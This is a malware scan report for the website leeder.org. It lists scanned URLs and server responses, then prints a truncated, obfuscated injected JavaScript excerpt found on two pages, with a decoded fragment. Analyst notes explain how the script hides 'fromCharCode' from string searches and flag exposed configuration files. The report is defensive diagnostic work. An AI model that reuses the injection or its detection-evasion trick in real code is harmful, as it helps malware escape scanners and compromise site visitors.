Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=leeder.org
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
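Scanned pages/files
Note: the Status column reports malware detection only. Several entries listed as "clean" below (php.ini, its .bak copy and phpinfo.php) are returned with 200 OK to an unauthenticated request, so they disclose server configuration and should be removed or access-restricted regardless of their scan status.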
Request | Server response | Status |
http://leeder.org/ | 200 OK Content-Length: 551 Content-Type: text/html | clean |
http://leeder.org/404.shtml | 200 OK Content-Length: 251 Content-Type: text/html | clean |
http://leeder.org/test404page.js | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
http://leeder.org/Backup/ | 200 OK Content-Length: 23017 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var [excerpt truncated by the scanner]
Analyst note: the excerpt never contains the literal string "fromCharCode". g.getMonth() on the hard-coded date returns 10, giving "from10e", and r.replace(10, "CharCod") turns that into "fromCharCode", so a plain search for fromCharCode in site files will not find this injection. Most other statements are unused filler. The loop over document.styleSheets rules presumably reads encoded data from CSS, but the excerpt is cut off before that is shown.
Decoded script:
function () { var nC = 24508; var vI = new Array; this.yC = false; this.zK = "zK"; var sN = 59341; eG.q(); var eQ = new Date; var lD = function () {}; var dT = false; pP = ""; this.eGB = ""; mK = "mK"; var sD = function () {return "sD";}; var rT = ""; } /*** called setTimeout with function () { var nC = 24508; var vI = new Array; this.yC = false; this.zK = "zK"; var sN = 59341; eG.q(); var eQ = new Date; var lD = function () {}; var dT = false; pP = ""; this.eGB = ""; mK = "mK"; var sD = function () {return "sD";}; var rT = ""; }, 342 */ <html ><head ></head><body ></body></html>
Antivirus reports:
| ||
http://leeder.org/Backup/../cpanel | 200 OK Content-Length: 8889 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: cpanel.leeder.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <title>cPanel Redirect</title> <style type="text/css"> .statusBox { width: 80px; } .fb { width:43%; float:left; text-align:center; margin:5px 20px 5px 20p ...[4374 bytes skipped]... | ||
http://leeder.org/Backup/../webmail | 200 OK Content-Length: 8894 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: webmail.leeder.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <title>cPanel Redirect</title> <style type="text/css"> .statusBox { width: 80px; } .fb { width:43%; float:left; text-align:center; margin:5px 20px 5px 20px ...[4373 bytes skipped]... | ||
http://leeder.org/cgi-bin/ | 403 Forbidden Content-Length: 228 Content-Type: text/html | clean |
http://leeder.org/index_oster.htm | 200 OK Content-Length: 22546 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var [excerpt truncated by the scanner]
Analyst note: this excerpt is identical to the one reported for http://leeder.org/Backup/, which suggests the same injection was written into more than one file. Cleanup should therefore cover every HTML/JS file on the site, not only the two URLs flagged here.
Decoded script:
function () { var nC = 24508; var vI = new Array; this.yC = false; this.zK = "zK"; var sN = 59341; eG.q(); var eQ = new Date; var lD = function () {}; var dT = false; pP = ""; this.eGB = ""; mK = "mK"; var sD = function () {return "sD";}; var rT = ""; } /*** called setTimeout with function () { var nC = 24508; var vI = new Array; this.yC = false; this.zK = "zK"; var sN = 59341; eG.q(); var eQ = new Date; var lD = function () {}; var dT = false; pP = ""; this.eGB = ""; mK = "mK"; var sD = function () {return "sD";}; var rT = ""; }, 342 */ <html ><head ></head><body ></body></html>
Antivirus reports:
| ||
http://leeder.org/php.ini | 200 OK Content-Length: 39384 Content-Type: text/plain | clean |
http://leeder.org/php.ini.bak.ext.07_25_14 | 200 OK Content-Length: 39328 Content-Type: application/vnd.novadigm.ext | clean |
http://leeder.org/phpinfo.php | 200 OK Content-Length: 74932 Content-Type: text/html | clean |
http://leeder.org/phpinfo.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 | 200 OK Content-Length: 14077 Content-Type: text/html | clean |
http://leeder.org/function.phpinfo | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
http://leeder.org/robots.txt | 200 OK Content-Length: 473 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: leeder.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:38:21 GMT
Server: Apache
Content-Length: 551
Content-Type: text/html;charset=ISO-8859-1
...551 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: leeder.org
Referer: http://www.google.com/search?q=leeder.org
Result:
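The result is similar to the first query; no suspicious redirects were found. This check varies only the Referer header, so it does not rule out redirects that depend on other request properties such as the User-Agent or the client IP address.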